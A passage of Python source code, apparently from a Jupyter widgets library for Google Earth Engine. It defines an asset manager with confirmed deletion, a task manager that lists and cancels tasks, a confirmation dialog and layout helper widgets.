checkrow.observe_widget(handler, names=['selected_index'], **kwargs)
def set_checkbox_handler(self, index, handler, **kwargs):
''' set the handler for CheckBox in index '''
checkrow = self.children[index]
checkrow.observe_checkbox(handler, **kwargs)
class AssetManager(VBox):
""" Asset Manager Widget """
POOL_SIZE = 5
def __init__(self, map=None, **kwargs):
super(AssetManager, self).__init__(**kwargs)
# Thumb height
self.thumb_height = kwargs.get('thumb_height', 300)
self.root_path = ee.data.getAssetRoots()[0]['id']
# Map
self.map = map
# Header
self.reload_button = Button(description='Reload')
self.add2map = Button(description='Add to Map')
self.delete = Button(description='Delete Selected')
header_children = [self.reload_button, self.delete]
# Add2map only if a Map has been passed
if self.map:
header_children.append(self.add2map)
self.header = HBox(header_children)
# Reload handler
def reload_handler(button):
new_accordion = self.core(self.root_path)
# Set VBox children
self.children = [self.header, new_accordion]
# add2map handler
def add2map_handler(themap):
def wrap(button):
selected_rows = self.get_selected()
for asset, ty in selected_rows.items():
if ty == 'Image':
im = ee.Image(asset)
themap.addLayer(im, {}, asset)
elif ty == 'ImageCollection':
col = ee.ImageCollection(asset)
themap.addLayer(col)
return wrap
# Set reload handler
# self.reload_button.on_click(reload_handler)
self.reload_button.on_click(self.reload)
# Set reload handler
self.add2map.on_click(add2map_handler(self.map))
# Set delete selected handler
self.delete.on_click(self.delete_selected)
# First Accordion
self.root_acc = self.core(self.root_path)
# Set VBox children
self.children = [self.header, self.root_acc]
def delete_selected(self, button=None):
''' function to delete selected assets '''
selected = self.get_selected()
# Output widget
output = HTML('')
def handle_yes(button):
self.children = [self.header, output]
# pool = pp.ProcessPool(self.POOL_SIZE)
if selected:
assets = [ass for ass in selected.keys()]
''' OLD
for asset, ty in selected.items():
recrusive_delete_asset_to_widget(asset, output)
args = []
for asset, ty in selected.items():
args.append((asset, output))
# pool.map(recrusive_delete_asset_to_widget, args)
# pool.map(test2, args)
# pool.close()
# pool.join()
'''
''' Pool way (not good)
pool = Pool(self.POOL_SIZE)
pool.map(batch.recrusive_delete_asset, assets)
# TODO: cant map recrusive_delete_asset_to_widget because the passed widget is not pickable
pool.close()
pool.join()
'''
for assetid in assets:
thread = Thread(target=batch.recrusive_delete_asset,
args=(assetid,))
thread.start()
# when deleting end, reload
self.reload()
def handle_no(button):
self.reload()
def handle_cancel(button):
self.reload()
assets_str = ['{} ({})'.format(ass, ty) for ass, ty in selected.items()]
assets_str = '</br>'.join(assets_str)
confirm = ConfirmationWidget('<h2>Delete {} assets</h2>'.format(len(selected.keys())),
'The following assets are going to be deleted: </br> {} </br> Are you sure?'.format(assets_str),
handle_yes=handle_yes,
handle_no=handle_no,
handle_cancel=handle_cancel)
self.children = [self.header, confirm, output]
def reload(self, button=None):
new_accordion = self.core(self.root_path)
# Set VBox children
self.children = [self.header, new_accordion]
def get_selected(self):
''' get the selected assets
:return: a dictionary with the type as key and asset root as value
:rtype: dict
'''
def wrap(checkacc, assets={}, root=self.root_path):
children = checkacc.children # list of CheckRow
for child in children:
checkbox = child.children[0] # checkbox of the CheckRow
widget = child.children[1] # widget of the CheckRow (Accordion)
state = checkbox.value
if isinstance(widget.children[0], CheckAccordion):
title = widget.get_title(0).split(' ')[0]
new_root = '{}/{}'.format(root, title)
newselection = wrap(widget.children[0], assets, new_root)
assets = newselection
else:
if state:
title = child.children[1].get_title(0)
# remove type that is between ()
ass = title.split(' ')[0]
ty = title.split(' ')[1][1:-1]
# append root
ass = '{}/{}'.format(root, ass)
# append title to selected list
# assets.append(title)
assets[ass] = ty
return assets
# get selection on root
begin = self.children[1] # CheckAccordion of root
return wrap(begin)
def core(self, path):
# Get Assets data
root_list = ee.data.getList({'id': path})
# empty lists to fill with ids, types, widgets and paths
ids = []
types = []
widgets = []
paths = []
# iterate over the list of the root
for content in root_list:
# get data
id = content['id']
ty = content['type']
# append data to lists
paths.append(id)
ids.append(id.replace(path+'/', ''))
types.append(ty)
wid = HTML('Loading..')
widgets.append(wid)
# super(AssetManager, self).__init__(widgets=widgets, **kwargs)
# self.widgets = widgets
asset_acc = CheckAccordion(widgets=widgets)
# TODO: set handler for title's checkbox: select all checkboxes (DONE)
# set titles
for i, (title, ty) in enumerate(zip(ids, types)):
final_title = '{title} ({type})'.format(title=title, type=ty)
asset_acc.set_title(i, final_title)
def handle_new_accordion(change):
path = change['path']
index = change['index']
ty = change['type']
if ty == 'Folder' or ty == 'ImageCollection':
wid = self.core(path)
else:
image = ee.Image(path)
try:
info = image.getInfo()
width = int(info['bands'][0]['dimensions'][0])
height = int(info['bands'][0]['dimensions'][1])
new_width = int(self.thumb_height/height*width)
thumb = image.getThumbURL({'dimensions':[new_width,
self.thumb_height]})
# wid = ImageWid(value=thumb)
wid_i = HTML('<img src={}>'.format(thumb))
wid_info = create_accordion(info)
wid = HBox(children=[wid_i, wid_info])
except Exception as e:
message = str(e)
wid = HTML(message)
asset_acc.set_widget(index, wid)
def handle_checkbox(change):
path = change['path']
widget = change['widget'] # Accordion
wid_children = widget.children[0] # can be a HTML or CheckAccordion
new = change['new']
if isinstance(wid_children, CheckAccordion): # set all checkboxes to True
for child in wid_children.children:
check = child.children[0]
check.value = new
# set handlers
for i, (path, ty) in enumerate(zip(paths, types)):
asset_acc.set_accordion_handler(
i, handle_new_accordion,
extra_params={'path':path, 'index':i, 'type': ty}
)
asset_acc.set_checkbox_handler(
i, handle_checkbox,
extra_params={'path':path, 'index':i, 'type': ty}
)
return asset_acc
class TaskManager(VBox):
def __init__(self, **kwargs):
super(TaskManager, self).__init__(**kwargs)
# Header
self.checkbox = Checkbox(indent=False,
layout=Layout(flex='1 1 20', width='auto'))
self.cancel_selected = Button(description='Cancel Selected',
tooltip='Cancel all selected tasks')
self.cancel_all = Button(description='Cancell All',
tooltip='Cancel all tasks')
self.refresh = Button(description='Refresh',
tooltip='Refresh Tasks List')
self.autorefresh = ToggleButton(description='auto-refresh',
tooltip='click to enable/disable autorefresh')
self.slider = IntSlider(min=1, max=10, step=1, value=5)
self.hbox = HBox([self.checkbox, self.refresh,
self.cancel_selected, self.cancel_all,
self.autorefresh, self.slider])
# Tabs for COMPLETED, FAILED, etc
self.tabs = Tab()
# Tabs index
self.tab_index = {0: 'RUNNING',
1: 'COMPLETED',
2: 'FAILED',
3: 'CANCELED',
4: 'UNKNOWN'}
self.taskVBox = VBox()
self.runningVBox = VBox()
self.completedVBox = VBox()
self.failedVBox = VBox()
self.canceledVBox = VBox()
self.unknownVBox = VBox()
self.tab_widgets_rel = {'RUNNING': self.runningVBox,
'COMPLETED': self.completedVBox,
'FAILED': self.failedVBox,
'CANCELED': self.canceledVBox,
'UNKNOWN': self.unknownVBox}
# Create Tabs
self.tab_widgets = []
for key, val in self.tab_index.items():
widget = self.tab_widgets_rel[val]
self.tab_widgets.append(widget)
self.tabs.children = self.tab_widgets
self.tabs.set_title(key, val)
''' autorefresh
def update_task_list(widget):
# widget is a VBox
tasklist = ee.data.getTaskList()
widlist = []
for task in tasklist:
accordion = create_accordion(task)
if task.has_key('description'):
name = '{} ({})'.format(task['description'], task['state'])
else:
name = '{} ({})'.format(task['output_url'][0].split('/')[-1], task['state'])
mainacc = Accordion(children=(accordion, ))
mainacc.set_title(0, name)
mainacc.selected_index = None
wid = CheckRow(mainacc)
#wid = CheckRow(accordion)
widlist.append(wid)
widget.children = tuple(widlist)
'''
def loop(widget):
while True:
self.update_task_list()(self.refresh)
time.sleep(self.slider.value)
# First widget
self.update_task_list(vbox=self.runningVBox)(self.refresh)
# self.children = (self.hbox, self.taskVBox)
self.children = (self.hbox, self.tabs)
# Set on_click for refresh button
self.refresh.on_click(self.update_task_list(vbox=self.selected_tab()))
''' autorefresh
thread = threading.Thread(target=loop, args=(self.taskVBox,))
thread.start()
'''
# Set on_clicks
self.cancel_all.on_click(self.cancel_all_click)
self.cancel_selected.on_click(self.cancel_selected_click)
# self.autorefresh
def autorefresh_loop(self):
pass
def tab_handler(self, change):
if change['name'] == 'selected_index':
self.update_task_list()(self.refresh)
def selected_tab(self):
''' get the selected tab '''
index = self.tabs.selected_index
tab_name = self.tab_index[index]
return self.tab_widgets_rel[tab_name]
def update_task_list(self, **kwargs):
def wrap(button):
self.selected_tab().children = (HTML('Loading...'),)
try:
tasklist = ee.data.getTaskList()
# empty lists
running_list = []
completed_list = []
failed_list = []
canceled_list = []
unknown_list = []
all_list = {'RUNNING': running_list, 'COMPLETED': completed_list,
'FAILED': failed_list, 'CANCELED': canceled_list,
'UNKNOWN': unknown_list}
for task in tasklist:
state = task['state']
accordion = create_accordion(task)
if task['state'] == 'COMPLETED':
start = int(task['start_timestamp_ms'])
end = int(task['creation_timestamp_ms'])
seconds = float((start-end))/1000
name = '{} ({} sec)'.format(task['output_url'][0].split('/')[-1],
seconds)
else:
name = '{}'.format(task['description'])
# Accordion for CheckRow widget
mainacc = Accordion(children=(accordion, ))
mainacc.set_title(0, name)
mainacc.selected_index = None
# CheckRow
wid = CheckRow(mainacc)
# Append widget to the CORRECT list
all_list[state].append(wid)
# Assign Children
self.runningVBox.children = tuple(running_list)
self.completedVBox.children = tuple(completed_list)
self.failedVBox.children = tuple(failed_list)
self.canceledVBox.children = tuple(canceled_list)
self.unknownVBox.children = tuple(unknown_list)
except Exception as e:
self.selected_tab().children = (HTML(str(e)),)
return wrap
def get_selected(self):
""" Get selected Tasks
:return: a list of the selected indexes
"""
selected = []
children = self.selected_tab().children
for i, child in enumerate(children):
# checkrow = child.children[0] # child is an accordion
state = child.checkbox.value
if state: selected.append(i)
return selected
def get_taskid(self, index):
# Get selected Tab
selected_wid = self.selected_tab() # VBox
# Children of the Tab's VBox
children = selected_wid.children
# Get CheckRow that corresponds to the passed index
checkrow = children[index]
# Get main accordion
mainacc = checkrow.widget
# Get details accordion
selectedacc = mainacc.children[0]
for n, child in enumerate(selectedacc.children):
title = selectedacc.get_title(n)
if title == 'id':
return child.value
def get_selected_taskid(self):
selected = self.get_selected()
selected_wid = self.selected_tab() # VBox
children = selected_wid.children
taskid_list = []
for select in selected:
'''
checkrow = children[select]
mainacc = checkrow.widget
selectedacc = mainacc.children[0]
for n, child in enumerate(selectedacc.children):
title = selectedacc.get_title(n)
if title == 'id':
taskid_list.append(child.value)
'''
taskid = self.get_taskid(select)
taskid_list.append(taskid)
return taskid_list
def cancel_selected_click(self, button):
selected = self.get_selected_taskid()
for taskid in selected:
try:
ee.data.cancelTask(taskid)
except:
continue
self.update_task_list()(self.refresh)
def cancel_all_click(self, button):
selected_wid = self.selected_tab() # VBox
children = selected_wid.children
for n, child in enumerate(children):
taskid = self.get_taskid(n)
try:
ee.data.cancelTask(taskid)
except:
continue
self.update_task_list()(self.refresh)
class ConfirmationWidget(VBox):
def __init__(self, title='Confirmation', legend='Are you sure?',
handle_yes=None, handle_no=None, handle_cancel=None, **kwargs):
super(ConfirmationWidget, self).__init__(**kwargs)
# Title Widget
self.title = title
self.title_widget = HTML(self.title)
# Legend Widget
self.legend = legend
self.legend_widget = HTML(self.legend)
# Buttons
self.yes = Button(description='Yes')
handler_yes = handle_yes if handle_yes else lambda x: x
self.yes.on_click(handler_yes)
self.no = Button(description='No')
handler_no = handle_no if handle_no else lambda x: x
self.no.on_click(handler_no)
self.cancel = Button(description='Cancel')
handler_cancel = handle_cancel if handle_cancel else lambda x: x
self.cancel.on_click(handler_cancel)
self.buttons = HBox([self.yes, self.no, self.cancel])
self.children = [self.title_widget, self.legend_widget, self.buttons]
class RealBox(Box):
""" Real Box Layout
items:
[[widget1, widget2],
[widget3, widget4]]
"""
items = List()
width = Int()
border_inside = Unicode()
border_outside = Unicode()
def __init__(self, **kwargs):
super(RealBox, self).__init__(**kwargs)
self.layout = Layout(display='flex', flex_flow='column',
border=self.border_outside)
def max_row_elements(self):
maxn = 0
for el in self.items:
n = len(el)
if n>maxn:
maxn = n
return maxn
@observe('items')
def _ob_items(self, change):
layout_columns = Layout(display='flex', flex_flow='row')
new = change['new']
children = []
# recompute size
maxn = self.max_row_elements()
width = 100/maxn
for el in new:
for wid in el:
if not wid.layout.width:
if self.width:
wid.layout = Layout(width='{}px'.format(self.width),
border=self.border_inside)
else:
wid.layout = Layout(width='{}%'.format(width),
border=self.border_inside)
hbox = Box(el, layout=layout_columns)
children.append(hbox)
self.children = children
class FloatBandWidget(HBox):
min = Float(0)
max = Float(1)
def __init__(self, **kwargs):
super(FloatBandWidget, self).__init__(**kwargs)
self.minWid = FloatText(value=self.min, description='min')
self.maxWid = FloatText(value=self.max, description='max')
self.children = [self.minWid, self.maxWid]
self.observe(self._ob_min, names=['min'])
self.observe(self._ob_max, names=['max'])
def _ob_min(self, change):
new = change['new']
self.minWid.value = new
def _ob_max(self, change):
new = change['new']
self.maxWid.value = new
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.